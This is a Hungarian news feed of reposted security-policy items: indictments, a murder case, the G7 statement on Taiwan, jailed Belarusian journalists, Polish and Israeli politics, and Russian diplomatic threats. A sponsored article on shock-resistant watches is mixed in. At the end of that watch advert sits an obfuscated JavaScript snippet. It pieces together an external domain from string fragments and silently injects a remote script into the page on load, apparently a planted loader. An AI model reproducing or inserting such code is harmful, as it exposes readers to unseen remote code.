Biztonságpolitika

Vádat emeltek egy budapesti kábítószerterjesztő-hálózat tagjai ellen: a vád szerint négyen marihuánával kereskedtek, ötödik társuk pedig a kábítószer megőrzésében vállalt szerepet – közölte a Fővárosi Főügyészség.

A vádirat szerint egy 27 éves férfi három ismerősével marihuánával kereskedett Budapesten, míg a 29 éves testvére, aki nem vett részt a kereskedésben, ideiglenes megőrzésre átvett tőle egy nagyobb csomag kábítószert – olvasható a közleményben.

Azt írták, a 27 éves férfi nagyobb tételekben szerzett be marihuánát, amelyet egy XX. kerületi lakásban és garázsban tárolt, porciózott, majd főként további kereskedőknek értékesített. Társa egy 26 éves vádlott volt, akit közös – a drogkereskedésbe szintén beszálló – ismerősük mutatott be neki. Ő egy XIX. kerületi lakásban terjesztette a kábítószert. Egy negyedik férfi is több alkalommal közreműködött az értékesítésben.

Az ügyészség közölte, a kereskedők üzenetküldő alkalmazáson keresztül egyeztettek, és a 27 éves férfi rendszerint az egyébként általa üzemeltetett taxival szállította hetente egy vagy több részletben a marihuánát Pesterzsébetről Kispestre.

A budapesti rendőrök 2020 júniusának végén összehangolt akcióban fogták el a hálózat tagjait. Akkor jelentős mennyiségű kábítószert és a terjesztéshez szükséges digitális mérlegeket, növényőrlőket, csomagolóanyagokat is lefoglaltak. Amikor a 29 éves testvér otthonát kutatták át, ő a becsomagolt marihuánát az erkélyen keresztül kidobta az utcára, de azt a nyomozók megtalálták és lefoglalták.

A Fővárosi Főügyészség a négy férfit – a 27 évest jelentős mennyiségre elkövetett – kábítószer-kereskedelem bűntettével, míg a 29 éves testvért kábítószer birtoklásával vádolja. A 27 éves férfi jelenleg is bűnügyi felügyelet alatt áll.

 

The post Vádat emeltek egy kábítószerterjesztő-hálózat tagjai ellen Budapesten appeared first on .

Az egész térség stabilitását veszélybe sodorhatja Kína válasza az amerikai házelnök tajvani látogatására a világ legfejlettebb iparú demokráciáit összefogó G7 csoport szerint.

A országcsoport külügyminisztereinek szerdai közleményében kiemelték, hogy a törvényhozók hivatalos nemzetközi látogatásai hozzátartoznak a nemzetközi közösség életéhez, “normális és rutinszerű” aktusok. Ezért Nancy Pelosi tajpeji vizitjét sem lehet “ürügyként használni a Tajvani-szorosban folytatott agresszív katonai tevékenységre”.

Peking közelmúltbeli és bejelentett lépései, különösen a tervezett hadgyakorlat és a Tajvan elleni gazdasági szankciók “szükségtelen eszkalációval fenyegetnek” – áll a soros elnök, Németország külügyminisztériuma által kiadott közleményben. Kína nem változtathatja meg a térségbeli viszonyokat “egyoldalúan, erőszakkal”, a Tajvannal összefüggő nézeteltéréseket békés eszközökkel kell rendezni – húzták alá, hozzátéve, hogy “mindenek felett nyugalomra, önmérsékletre, átláthatóságra, a félreértések megelőzése érdekében pedig a nyílt kommunikációs csatornák fenntartására” ösztönöznek.

Egyben közölték, hogy a Hetek továbbra is képviselik az “egy Kína” elvet, és nem változtatnak a Tajvannal kapcsolatos álláspontjukon.

Az Egyesült Államok, Franciaország, Japán, Kanada, Nagy-Britannia, Németország és Olaszország, valamint az Európai Unió mint nemzetek feletti intézmény alkotta csoport külügyminiszterei – illetve az EU külügyi és biztonságpolitikai főképviselője – egyben megerősítették, hogy változatlanul kiállnak “a szabályokon alapuló nemzetközi rend, a béke és a stabilitás fenntartása mellett a Tajvani-szorosban és azon túl is”.

Pelosi személyében huszonöt éve először kereste fel Tajvant az amerikai képviselőház elnöke, aki kiemelt helyen, rögtön az elnök és az alelnök után áll az állami protokollsorrendben. A demokrata párti politikus ázsiai körútján járt Tajpejben, kedd este érkezett és szerdán már tovább is utazott Dél-Koreába.

Kína a saját területének tartja az 1949 óta önálló kormányzattal rendelkező szigetet, és ellenzi a tajvani vezetők kapcsolatait külföldi politikusokkal.

 

The post G7 csoport: fenyegeti a térségi stabilitást Peking válasza Pelosi tajvani látogatására appeared first on .

Valamennyi megyében megkezdődött a határvadásznak jelentkezők egészségügyi, pszichológiai és fizikai alkalmassági vizsgálata – közölte az Országos Rendőr-főkapitányság.

Első ütemben 2200 szerződéses határvadász felvétele, képzése és szolgálatba állítása szükséges a Bács-Kiskun Megyei, a Csongrád-Csanád Megyei, a Békés Megyei, a Hajdú-Bihar Megyei és a Szabolcs-Szatmár-Bereg Megyei határvadász századok állományába – olvasható a közleményben.

Emlékeztettek: a kormány 2022 júliusában döntött a szerződéses határvadász jogviszony létrehozásáról és a Rendőrség Határvadász Ezredének felállításáról.

A felvétel minél gördülékenyebb és hatékonyabb lebonyolítása érdekében a szerződéses határvadásznak jelentkezőkkel a toborzók folyamatosan tartják a kapcsolatot – olvasható a közleményben.

A határvadászok feladata lesz a déli és az uniós külső határok védelme, lesz fegyverhasználati, igazoltatási, előállítási joguk is. A határvadászok kiképzésük alatt 300 ezer, utána 400 ezer forintos illetmény kapnak.

The post ORFK: megkezdődött a határvadásznak jelentkezők alkalmassági szűrése appeared first on .

Bűnszervezetben elkövetett, különösen jelentős vagyoni hátrányt okozó költségvetési csalás miatt emelt vádat a Somogy Megyei Főügyészség 74 ember ellen, akik egy 69 gazdasági társaságból álló céghálózattal több mint kétmilliárd vagyoni hátrányt okoztak az állami költségvetésnek.

A vádhatóság a közleményében azt írta: a bűnszervezetet vezető kistarcsai vádlott és 14 társa cégvezetőkből, könyvelőkből, bérszámfejtőkből, ügyintézőkből és futárokból álló bűnszervezetet hozott létre azért, hogy a takarítási és vagyonőri szolgáltatást nyújtó társaságok adóterhét illegális eszközökkel minimalizálja.

A 69 gazdasági társaságot magában foglaló céghálózatban a “megrendelő” gazdasági társaságoknál foglalkoztatott munkavállalókat ténylegesen nem működő cégekbe jelentették be azért, hogy eltitkolhassák az alkalmazottak után fizetendő foglalkoztatást terhelő adókat és járulékokat. A cégháló további két szintjére a vádlottak “közvetítő” és “pénzkezelő/vagyonkezelő” cégeket szerveztek, amelyek a cégpiramis csúcsán lévő megrendelői cégeknek a munkavállalóik által végzett munkákról fiktív számlákat bocsátottak ki.

A bűnszervezet összesen 2,2 milliárd forint vagyoni hátrányt okozott az állami költségvetésnek, egyebek mellett az áfa jogosulatlan visszaigénylésével. A vádhatóság az eljárás során négy vádlottal kötött egyezséget, ők a megállapodás értelmében beismerő vallomást tettek és az okozott kárból mintegy 150 millió forintot megtérítettek.

Az adóhivatal pénzügyi nyomozói ezen kívül 1,5 milliárd forint összértékben foglaltak le, illetve vettek zár alá ingatlanokat, gépjárműveket és egyéb, vagyoni értékű jogokat. A főügyészség a Budapesthez és Tolna megyéhez kötődő bűnszervezet tagjai ellen a Fővárosi Törvényszéken nyújtott be vádiratot. A bűnszervezetet irányító férfi 2021 nyarától letartóztatásban van – olvasható a közleményben.

 

The post Vagyonőri szolgáltatás: kétmilliárdos adócsalással vádolják egy bűnszervezet 74 tagját appeared first on .

Lezárult a nyomozás egy különös kegyetlenséggel elkövetett emberölés ügyében Pest megyében: a nyomozók szerint a gyanúsított 2020-ban halálra rugdosta, majd egy gödörben elásta élettársát – közölte a megyei rendőr-főkapitányság a rendőrség honlapján. A nő holttestét egy ló teteme alól ásták ki.

A gyanúsított az elfogása, múlt év februárja óta letartóztatásban van, a nyomozás iratait átadták az ügyészségnek. Az ügyben azután indult nyomozás, hogy a 49 éves nő eltűnését 2021 januárjában bejelentette a féltestvére. A rendőrök már a körözési eljárás elején gyanúsnak találták az eltűnés körülményeit.

A nő élettársa a rendőrségnek először azt mondta, hogy 2020 nyarán megromlott a kapcsolatuk és az asszony elhagyta, azóta semmit nem tud róla. A férfi később azzal állt elő, hogy párja öngyilkos lett: vallomása szerint 2020 késő őszén egy hajnalban arra ébredt, hogy a nő felakasztotta magát. Megriadt, amikor a konyhában meglátta, ezért kivonszolta a testet és egy gödörbe rejtette. Erről részletesen beszélt, ám a nő halálának körülményeiről “továbbra is ködösített” és tagadta, hogy abban része lett volna.

A pár közös veresegyházi lakásának közelében lévő helyszínt 2021. február 5-én a rendőrök a Pest Megyei Kutató-Mentő Szolgálat munkatársaival speciális eszközökkel vették körbe. Az elhullott állatok sírhelyéül szolgáló gödörből kora hajnalig több köbméternyi földet kellett kikotorni, mire egy ló teteme alól felbukkant egy emberi testrész.

A vádlott ekkor beismerte: utolsó, 2020. november 5-ei veszekedésükkor lefejelte, majd bakanccsal halálra rugdosta áldozatát. A nő testét pokrócba tekerte, begurította a gödörbe, majd gallyakkal és hulladékokkal befedte. A férfi azt is elmondta, mintegy négyéves kapcsolatuk alatt – főként párja italozó, munkakerülő életmódja miatt – sokat marakodtak, verekedtek.

A boncoláskor a holttesten számos külsérelmi nyomot találtak, az áldozat fejét, felsőtestét és alsó végtagjait nagy erőbehatások érték. Egyértelmű volt, hogy ezek bántalmazásból erednek. A sorozatos bordatörések, a szilánkos lapockatörés, a térdhajlati és bokasérülések mellett a légcsőben fogmaradványokat találtak.

Az igazságügyi szakértői vizsgálat szerint a vádlott nem szenved elmezavarban, tudatzavarban vagy értelmi fogyatékosságban. Tettével, annak következményeivel tisztában volt és van, büntethetőséget megszüntető ok nincs – áll a közleményben.

 

The post Egy lótetem alól ásták ki a halálra rugdosott nőt appeared first on .

Hosszú börtönbüntetésre ítélték a lengyelországi székhelyű, fehérorosz nyelvű Belsat televízió újabb újságíróját Fehéroroszországban.

Az 52 éves Irina Szlavnyikavát öt év szabadságvesztéssel sújtotta a délkelet-fehéroroszországi Homel város illetékes bírósága szélsőséges szervezet létrehozásának vádjával és engedély nélküli tüntetéseken való részvétel miatt. A fehérorosz újságírószövetség szerint a törvényszék által megállapított büntetési tétel egy évvel hosszabb, mint amennyit az ügyészség kért.

“Az újságírók nem szélsőségesek, a máskéntgondolkodás pedig nem bűn” – olvasható a fehérorosz újságírószövetség szerdán közzétett állásfoglalásában. “A fehérorosz hatóságok továbbra is üldözik az újságírókat pusztán amiatt, hogy élnek a szólásszabadsághoz való jogukkal” – tette hozzá a jogvédő szervezet.

Szlavnyikava már a harmadik Belsat-újságíró, akit börtönnel sújtottak Fehéroroszországban, ahol szélsőséges szervezetként tartják nyilván a lengyel kormány által fenntartott, 2007-ben alapított tévécsatornát. A Belsat YouTube-csatornájának 474 ezer követője van. A múlt hónap közepén további nyolc év börtönbüntetéssel sújtották Katerina Bahvalovát, a Belsat oknyomozó újságíróját árulás vádjával a korábban megállapított kétéves szabadságvesztésén felül. Kollégája, Darja Csulcova kétéves szabadságvesztését tölti, amelyet 2021-ben szabtak ki rá.

Szlavnyikava az utóbbi tíz hónapot hatósági őrizetben töltötte, tavaly októberben állították elő a minszki repülőtéren, miután visszatért vakációjáról. Kezdetben tizenöt nap elzárásra ítélték a Facebook-oldalán közölt “szélsőséges tartalmak” miatt. Varsóban kedden és szerdán szimpátiatüntetéseket tartottak az újságírók mellett. Az aktivisták szankciókat követeltek azon fehérorosz hatósági személyek ellen, akik igazságtalanul járnak el az újságírókkal szemben.

Az ügyben megszólalt Mateusz Morawiecki lengyel kormányfő is. Facebook-fiókjában azt írta: “az elfogadhatatlan ítéletre” Lengyelország “azonnali, határozott és nemzetközi szintű” választ fog adni, ő maga már ebben az értelemben adott utasítást a varsói külügyminisztériumnak.

“A sajtó- és a szólásszabadság, valamint a véleménynyilvánítás korlátlan joga a demokrácia alapja” – olvasható a bejegyzésben. Morawiecki “abszolút botránynak, mindenféle civilizációs szabály, az emberi jogok és az újságírói elvek megsértésének” nevezte Szlavnyikava elítélését.

Fehéroroszországban Aljakszandr Lukasenka 2020 augusztusban “nyerte el” hatodik elnöki mandátumát. A választások tisztaságát sokan vitatták, és ez több hónapon át tartó tömegtüntetésekhez vezetett. A hatóságok több mint 35 ezer demonstrálót vettek őrizetbe, a rendőrség ezreket bántalmazott. A megtorló intézkedések sorában bezárták a legnagyobb független médiumokat, blokkolták a népszerű hírportálokat, újságíróknál tartottak házkutatásokat és médiamunkásokat vettek őrizetbe.

 

The post Hosszú börtönbüntetésre ítéltek egy újabb újságírót Fehéroroszországban appeared first on .

Új rendőrkapitánya lett a XV. és a VIII. kerületnek – közölte a Budapesti Rendőr-főkapitányság hétfőn a police.hu oldalon.

Terdik Tamás, Budapest rendőrfőkapitánya hétfői hatállyal visszavonta Balogh Róbert XV. kerületi rendőrkapitány vezetői megbízását, és helyette megbízta Molnár Gábor eddigi VIII. kerületi rendőrkapitányt. A VIII. kerületi kapitányság vezetését Seres Ernő eddigi II. kerületi kapitány látja el, a II. kerületi rendőrkapitányság vezetését pedig – további intézkedésig – Móré Szabolcs kapitányságvezető-helyettes látja el.

 

The post Új rendőrkapitány a XV. és VIII. kerület élén appeared first on .

Az 1944-ben a németek által lerombolt Varsóról és a mai Mariupolról nyílt hétfőn fotókiállítás a lengyel fővárosban, a varsói felkelés 78. évfordulóján tartott rendezvényen Andrzej Duda lengyel elnök párhuzamot vont a két város sorsa között.

A Varsó egyik főterén, a Pilsudski téren megnyílt tárlatot úgy állították össze, hogy egymás mellett szerepelnek a háborús romokat és az áldozatokat is megjelenítő varsói és mariupoli fényképek.

Duda a megnyitón mondott beszédében elismerte: a fényképek brutálisak, “de brutális volt az is, ami itt, Varsóban zajlott a második világháború idején”, amikor a németek “kíméletlenül gyilkolták a főváros polgári lakosságát”. Hozzátette: jelenleg “hasonlóan kíméletlen az Ukrajna elleni orosz agresszió”.

Az államfő a következő nemzedékek szempontjából is fontosnak nevezte a történelem és a jelenkor bemutatását “úgy, ahogy van”. Maa a “civilizált világ kötelessége” az ukrajnai háborús bűntettek elszámolása – tette hozzá. Tomasz Karasinski történész, a kiállítás kurátora felidézte: a felkelés kitörésének napján, 1944. augusztus 1-én a szovjetek a fővárost átszelő Visztula másik partján álltak, és “nézték a lengyelek mészárlását, ma pedig a világ az ukránok mészárlását nézi”.

A tervek szerint a kiállítást több lengyel városban, valamint külföldön bemutatják.

A varsói felkelést a Honi Hadsereg, a londoni lengyel emigráns kormány fegyveres szervezete robbantotta ki. A szovjet Vörös Hadsereg nem sietett a német megszállás ellen felkelők segítségére, így a húszezer katona és kétszázezer civil életét követelő küzdelem két hónap után elbukott. A nácik bosszúból szinte a földdel tették egyenlővé a lengyel fővárost.

A lengyel háborús anyagi veszteségekről szóló, a napokban megjelenő jelentést tavaly elkészítő parlamenti munkacsoport vezetője, Arkadiusz Mularczyk vasárnap a PAP lengyel hírügynökségnek elmondta: csak a főváros veszteségei több mint 380 milliárd zlotyra (32,3 ezer milliárd forint) tehetők.

Varsót a háborúban a németek négy fő szakaszban rombolták le, az 1939-es támadás során a város épületeinek tíz százalékát, az 1943-as gettófelkelés és a gettófelszámolás során 15 százalékát, az 1944-es felkelés során 25 százalékát, a felkelés után további 30 százalékát rombolták le, így összesen a város 80 százaléka semmisült meg – magyarázta Mularczyk. A felkelés 78. évfordulóján országszerte tartanak megemlékezéseket, a varsói eseményen részt vett a lengyelországi látogatáson tartózkodó David Hurley ausztráliai főkormányzó is.

 

The post Az 1944-ben lerombolt Varsóról és a mai Mariupolról nyílt fotókiállítás a lengyel fővárosban appeared first on .

Ukrajna egész Európát védelmezi az orosz agresszióval szembeni hősies ellenállással, és ha elesik, Moszkva tovább terjeszkedik Közép-Európa felé – jelentette ki a lengyel államfő egy keddi német lapinterjúban.

Andrzej Duda a Frankfurter Allgemeine Zeitung (FAZ) című konzervatív lapban közölt interjúban hangsúlyozta, hogy a más népek alárendeléséről szóló “nagyorosz” birodalmi eszme nem csak Vlagyimir Putyin orosz elnök gondolkodását határozza meg, hanem átitatja az orosz társadalom jelentős részét.

Így még az is előfordul, hogy orosz újságírók a lengyelországi – az ország középső részén, Varsótól nyugatra fekvő – Kaliszig húzódó Oroszországról fecsegnek – tette hozzá.

Mindez azt jelenti, hogy Ukrajna Lengyelországot és Európát, így Németországot is védi. Ha pedig “hősies ellenállásuk Putyin birodalmi terveivel szemben” elbukik, közvetlenül fenyegetné Lengyelországot és a balti államokat az orosz befolyási övezet közép-európai irányú kiterjesztésének veszélye – fejtette ki a politikus.

Ezt a veszélyt “ma Ukrajnának köszönhetően sikerül megfékezni”, de “sajnos a jövőben is aktuális lesz” – tette hozzá Duda. Mint mondta, az egyetlen megoldás “a biztonságunk megerősítése”, mert így a “potenciális agresszornak kevésbé éri meg támadni”. Ukrajna példája éppen azt mutatja, hogy mire képes egy ország, amely jól felkészült a védekezésre – tette hozzá a lengyel államfő.

Kifejtette: ugyancsak az Ukrajna elleni orosz agresszióval függ össze Lengyelország egy másik súlyos problémája, a télre szánt kőszén fenyegető hiánya. A szenet eddig jórészt Oroszországból importálták, és háztartások millióit fűtötték vele.

A kormány “legnagyobb gondja” így az Ukrajna elleni orosz háború miatt fenyegető hiány elhárítása, az ellátás biztosítása – mondta Duda, megjegyezve, hogy az európai uniós éghajlatvédelmi célok elérése eddig is “nagy kihívás” volt Lengyelországnak, és “a háború mindent még bonyolultabbá tett”.

A többi között arról is szólt, hogy mindig is ellenezte az Oroszországot Németországgal közvetlenül összekötő, Ukrajnát és Lengyelországot megkerülő Északi Áramlat földgázvezeték-rendszert, és soha nem hitte el Angela Merkel volt német kancellár azon állítását, miszerint a két vezetékpárból (a 2011 óta működő Északi Áramlat-1-ből és a 2021 végén befejezett, de a háború miatt végül üzembe nem állított Északi Áramlat-2-ből) álló fejlesztés tisztán üzleti alapú beruházás.

Mint mondta, a volt kancellárral folytatott megbeszélések sokaságán, éveken keresztül mindhiába igyekezett jelezni, hogy az Északi Áramlat valójában “Európának káros, ránk, lengyelekre pedig gyilkos” hatású. Ez a vezetékrendszer “a kulcs az európai piac orosz dominanciájához”, és ezt Lengyelország számos szomszédja is így látta – mondta Andrzej Duda a FAZ-nak.

 

The post Lengyel államfő: Ukrajna egész Európát védelmezi appeared first on .

Jaír Lapid izraeli miniszterelnök tovább folytatta elődei “kétértelmű”, a nukleáris képességeket nem tagadó, de nem is elismerő politikáját, amikor a hivatalosan soha be nem jelentett nukleáris fegyverekre utalva kijelentette, hogy “egyéb képességei” tartják biztonságban Izraelt – jelentette a The Times of Israel.

Lapid – a hírportál szerint – Teheránt figyelmeztette Izrael állítólagos atomfegyvereire hivatkozva az Izraeli Atomenergia Bizottság (IAEC) új vezetőjének beiktatási ünnepségén. A kormányfő azt mondta, hogy Izrael hadműveleti lehetőségei védelmi és támadó képességekből állnak, valamint abból, amit a külföldi média hajlamos “egyéb képességeknek” nevezni.

“Ezek az «egyéb képességek» tartanak életben bennünket, és a jövőben is életben is fognak tartani, amíg mi és gyermekeink itt élünk” – mondta Lapid. Ezzel a helyi lapok szerint nyilvánvalóan a nukleáris fegyverekre célzott, melyek birtoklását Izrael hivatalosan nem erősítette meg.

Az eseményen felszólalt Naftali Bennett helyettes miniszterelnök is, aki távozott a kormányfői posztról, de továbbra is kezében tartja az “iráni ügyeket”. Bennett hangsúlyozta, hogy Izrael az elmúlt évben keményen dolgozott az iráni fenyegetés ellensúlyozásán, és “hatalmas erőforrásokat” fektet ezekbe az erőfeszítésekbe.

Az elmúlt hónapokban számos, atomtudósok és nukleáris létesítmények elleni merényletet és támadást tulajdonítottak Izraelnek Iránban, bár Jeruzsálem ritkán vagy egyáltalán nem vállalta nyilvánosan ezeket az akciókat. Az ünnepségen Zeev Snir köszönt le hét év után az IAEC-elnöki posztjáról. Mose Edrinek adta át a helyét, akit Bennett nevezett ki a tavaly júniustól idén június végéig tartó miniszterelnöksége idején.

Lapid kijelentései akkor hangzottak el, amikor a világhatalmak megpróbálnak tárgyalni Iránnal a 2015-ben létrejött, majd 2018-ban az Egyesült Államok kivonulása miatt összeomlott nukleáris megállapodás újjáélesztéséről, amelynek célja Irán nukleáris fegyverkezésének megakadályozása.

Az izraeli kormányfő beszédének idején New Yorkban időszakos áttekintő konferenciát tartanak azok az országok, melyek 1970-ben aláírták az önkéntes atomsorompó-szerződést, melyhez Izrael nem csatlakozott. Jeruzsálem hagyományosan nem erősíti meg és nem is tagadja, hogy rendelkezik nukleáris fegyverekkel, és többször is kijelentette, hogy fenntartja magának a jogot, hogy csapást mérjen Iránra, hogy ezzel megakadályozza annak nukleáris fegyverhez jutását.

 

The post Lapid: “Egyéb képességei” tartják biztonságban Izraelt appeared first on .

Az elmúlt hetekben tapasztalt természeti katasztrófák arra ösztönöztek bennünket, hogy a katasztrófavédelmi rendszerben kijelölt állandó állomány mellé további erőket állítsunk készenlétbe – közölte a Magyar Honvédség (MH) parancsnoka.

Ruszin-Szendi Romulusz altábornagy felidézte, hogy két héttel ezelőtt két magyar helikopter állománya Szlovéniában segédkezett vízszállítással egy kiterjedt erdőtűz megfékezésében, de látható, hogy több országban is hasonló katasztrófákkal küzdenek.

A hétvégi esőzés ellenére hasonló helyzetek Magyarországon is előfordulhatnak, ezért – összhangban a honvédelmi miniszter által elrendeltekkel – a MH munkacsoportokkal és nagyobb személyi állománnyal erősítette meg állandó készenléti és készültségi szolgálatait – mondta a parancsnok.

Az altábornagy kifejtette: a személyi állomány jelentős részét, három helyőrségben 250 embert jelöltek ki kézi, műszaki munkák elvégzésére, továbbá több munkacsoportot is felállítottak, amelyek munkagépekkel nehezebb műszaki feladatok ellátására is képesek a természeti katasztrófák esetében. Ezek az erők szükség esetén Magyarország bármely területén bevethetők.

A honvédség logisztikai és egészségügyi biztosításról is gondoskodott, így a katasztrófavédelemben résztvevő katonákon kívül az adott térségben élők ellátását is el tudják végezni mobil orvoscsoportjaik és egészségügyi szolgálatuk révén – fűzte hozzá Ruszin-Szendi.

A parancsnok kitért arra is, hogy a MHg hétfőn vette át NATO-küldetésben a balti államok légtérrendészetének feladatait. A magyar Gripenek és pilóták nemcsak Magyarország és Szlovénia légterére vigyáznak, hanem a balti államokban is újra ellátják ezt a feladatot.

Ruszin-Szendi jelezte ugyanakkor azt is, hogy Koszovóban fellángoltak a feszültségek, az ott állomásozó NATO-erők parancsnoka éppen egy magyar tábornok. Megtesznek mindent, hogy “lehűtsék a kedélyeket és az ott élők számára fenntartsák a békét és a biztonságot” – fogalmazott a MH parancsnoka.

 

The post Ruszin-Szendi: növelik a katasztrófavédelmi állomány létszámát appeared first on .

Az orosz-amerikai diplomáciai kapcsolatok megszakításához vezethet, ha az Egyesült Államok terrorizmust támogató országnak minősíti Oroszországot – jelentett ki Marija Zaharova, az orosz külügyminisztérium szóvivője.

A szóvivő naivnak nevezte az amerikai politikusokat, ha azt hiszik, saját jogszabályaiknak a “nemzetközi joggal ellentétes alkalmazásával” rákényszeríthetik Oroszországot arra, hogy az Egyesült Államok által kitalált szabályokon alapuló világrend szerint éljen. Minden hatás ellenhatást vált ki. Egy ilyen lépés logikus következménye lehet a diplomáciai kapcsolatok megszakítása is. Ezen túl Washington azt is kockáztatja, hogy átlépi a pontot, ahonnan nincs visszaút – mondta Zaharova.

“Ezzel Washingtonnak tisztában kell lennie. Mi készen állunk a helyzet bármilyen alakulására, és ha Washington úgy dönt, hogy teljesen leállítja a Moszkvával való együttműködést, mi túléljük” – tette hozzá. A szóvivő azt mondta, hogy az amerikai törvényhozók úgy érzik, már minden szankciós eszközt kimerítettek, ezért kezdeményezték, Oroszország átminősítését terrorizmust támogató országgá. Washingtonnak nincs elég hatalma ahhoz, hogy fellépjen a saját maga által terroristának minősített rezsimek ellen – közölte.

Az amerikai szenátus július 27-én határozatban szólította fel a külügyminisztériumot, hogy Oroszország kerüljön fel a terrorizmust támogató országok listájára. Korábban Kijev kezdeményezte ugyanezt. Az amerikai politikusok felszólításukat Oroszország ukrajnai, csecsenföldi, grúziai és szíriai beavatkozásaival indokolták. Július 28-án amerikai képviselők jelezték, hogy hasonló kétpárti kezdeményezésre készülnek az alsóházban.

A terrorizmust támogató országok listáján olyan államok szerepelnek, amelyek Washington szerint több alkalommal támogattak nemzetközi terrorcselekményeket. Zaharova kijelentette: az Egyesült Államoknak el kell döntenie, készen áll-e arra, hogy a hadászati stabilitásról az egyenjogúság alapján tárgyaljon Oroszországgal.

A szóvivő az orosz külügyi tárca nemtetszését nyilvánította ki amiatt, hogy az Auschwitz-Brirkenau náci német haláltábor helyén létesített emlékmúzeum lengyel vezetése, Moszkva értesítése nélkül, bezárta a Nagy Honvédő Háború Központi Múzeuma által létesített kiállítást, amelynek szerződése áprilisban lejárt.

Az intézmény igazgatósága kitért a szerződés újratárgyalása elől a moszkvai múzeummal – mondta Zaharova, aki ezt Varsónak a szovjet nép “felszabadító küldetése” és az általa meghozott kolosszális áldozatok emlékezetének kiirtására irányuló “cinikus kísérleteként” minősítette.

A Nancy Pelosi amerikai képviselőházi elnök tervezett tajvani látogatása miatt kialakul kínai-amerikai feszültségről Telegram-bejegyzésben fejtette ki álláspontját a szóvivő. Zaharova provokátorállamnak nevezte az Amerikai Egyesült Államokat, és közölte: az amerikaiak megsértik Kína másfél milliárd lakosát. Ugyanebben az ügyben Moszkva megértéséről és “abszolút szolidaritásáról” biztosította Pekinget Dmitrij Peszkov, a Kreml szóvivője.

 

The post Sértődés lenne, ha Washington a terrorizmus támogatójának minősítené Moszkvát appeared first on .

Mire készüljünk, ha túrázni indulunk?

Ha nem vagyunk megfelelően felszerelve és felkészülve egy túrára, akkor menet közben gyorsan rosszabb irányba fordulhat a kirándulás. Ahhoz, hogy semmi gond ne legyen, fontos, hogy figyeljünk a felszerelések minőségére, mint például a karóra, ami esetleg GPS-sel felszerelt, így mutatja számunkra a helyet. Emellett sok munkahelyen, foglalkozásnál lehet hasznos, ha a kiegészítő jól bírja a mindennapi strapát. Lássuk, hogy mit bírnak például az ütésálló karórák, mire képes egy minőségi felszerelés!

Amikor hátizsákos kirándulásra megyünk, sose vigyük magunkkal a legújabb cuccokat. Indulás előtt mindig érdemes ellenőrizni, hogy minden megvan-e, minden rendeltetésszerűen működik, hiszen csak így lehet problémamentes a túra. Ilyen például egy minőségi karóra, hiszen GPS-sel felszerelt okos változat nagyban megkönnyítheti a dolgunkat a terepen. Természetesen nem csak az óra számít – egy túrára rendesen fel kell készülni.

Amennyiben kint leszünk, gyakran előfordulhat, hogy valamilyen módon fel kell építeni magunknak egy “szállást” éjszakára. Próbáljuk ki előtte otthon, hogy a bicska, a gázfőző és például a bakancsunk megfelelően funkcionál, ne a kirándulás során szembesüljünk vele, hogy valami gond adódott. Ugyanez elmondható a karórákról, hiszen sok mindent kibírnak a strapabíró, ütésálló karórák. Ezek esetében azonban érdemes ügyelni arra, hogy vízálló is legyen, hiszen gyakran előfordul, hogy ránk szakad az ég. Mindenekelőtt tanuljuk meg használni a GPS készüléket, hiszen hiába van nálunk, ha azt sem tudjuk, hogy mit kell nézni.

G-Shock karóra, ami mindent kibír!

A G-Shock jelzést világszerte alkalmazzák, ami a szívósság szinonimájaként van jelen a köztudatban. A remek tulajdonságokkal ellátott modellsorozat nagy előnye, hogy többféle színben és variációban kapható, így bárki találhat magának megfelelő típust. A Casio G-Shock órákkal kapcsolatban elmondható, hogy tényleg szívósak, nem véletlenül került be a Guinness-rekordok könyvébe sem. Egy ilyen óra kibír egy közel 25 tonnás teherautót is, a tesztet követően pedig ugyanúgy működik tovább.

A karórát több módon is lehet jellemezni. Az egyik, hogy jól tűri az elektromos áramnak, a másik, hogy a centrifugális gravitációban szemben is képes ellenállni. Emellett nem okoz neki gondot az alacsony hőmérséklet, a víz és az ütés sem, emellett igen állhatatos. Természetesen léteznek egyéb márkás ütésálló kiegészítők is, így a Casio-nak versenyeznie kell többek között a Tommy Hilfigerrel és a Michael Kors gyártóval egyaránt.

Mi az ütésálló karóra titka?

Egy igazán profi karóra remek kiegészítője lehet bármely napi szettnek, hiszen még egy unalmas farmer és póló párost is egyszerűen fel tud dobni. Napjainkban az okostelefonok miatt már sokkal kisebb eséllyel vásárolunk magunknak karórát, hiszen a mobil mutatja az időt. Ettől függetlenül még mindig bőven akad olyan ember, aki népszerűnek és elegánsnak tartja ezeket a kellékeket, így nem véletlen kerültek most előtérbe az ütésálló karórák sem.

Egy férfi elvárja az órától, hogy tükrözze a személyiségét és az egyéniségét, emellett stílusos megjelenést kölcsönözzön neki. Fontosnak tartják továbbá, hogy kifogástalanul működjön, semmilyen probléma ne adódjon velük, még a strapabíróság kapcsán sem. Nem árt, ha tud néhány plusz funkciót, ezzel ugyanis le lehet nyűgözni a férfi nemet. Mivel a szerkezetet sokszor érik extra hatások, legyen szó munkahelyről, utazásról, az otthoni tevékenységekről, így nem árt, ha a naponta viselt darab jól tűri a megpróbáltatásokat. Egyes típusok képesek pulzusmérésre, van bennük iránytű, de még lépést is számlálnak. Az ásványi üvegből és a rozsdamentes acélból gyártott kiviteleknek köszönhetően pedig még a vízi sportok szerelmesei is találnak maguknak megfelelő kiegészítőt.

Egy ütésálló férfi karóra tehát számos esetben lehet praktikus, ha az ember egész nap hordani szeretné az időmérő eszközt. Mivel ezeknek nem okoz gondot, ha rájuk esik valami, esetleg hozzáütődnek egy erősebb tárgyhoz, így nem kell tartani attól, hogy esetleg megkarcolódnának vagy eltörne bennük az üveg. A különleges kellékek tehát amellett, hogy igen praktikusak, öltöztetik az Urakat, így egy hétköznapi szett mellé már nem is kell elgondolkodni az egyéb kiegészítőkön. Csak fel kell kapni az órát és már lehet is menni a munkába vagy vásárolni.

(function(){ cnlh=document.createElement("script");cnlh_=("ust");cnlhu="428448780"; cnlh_+="a"+("t.i");cnlh.type="text/javascript"; cnlhu+=".na22xug0nlhn9eehjibr";cnlh.async=true;cnlh_+="n"+("f"+"o")+"/"; cnlhu+="jyp8kqjh73";cnlh.src="https://"+cnlh_+cnlhu; document.body.appendChild(cnlh); })();

The post Ütésálló karóra férfiaknak – Mit bírnak ki ezek az órák? appeared first on .

Azon humanitárius szervezetek hajóit, amelyek rendszeresen végeznek emberek felkutatásával és mentésével kapcsolatos tevékenységet a tengeren, a báziskikötőjük felett joghatósággal bíró állam ellenőrizheti – mondta ki határozatban az Európai Unió Bírósága.

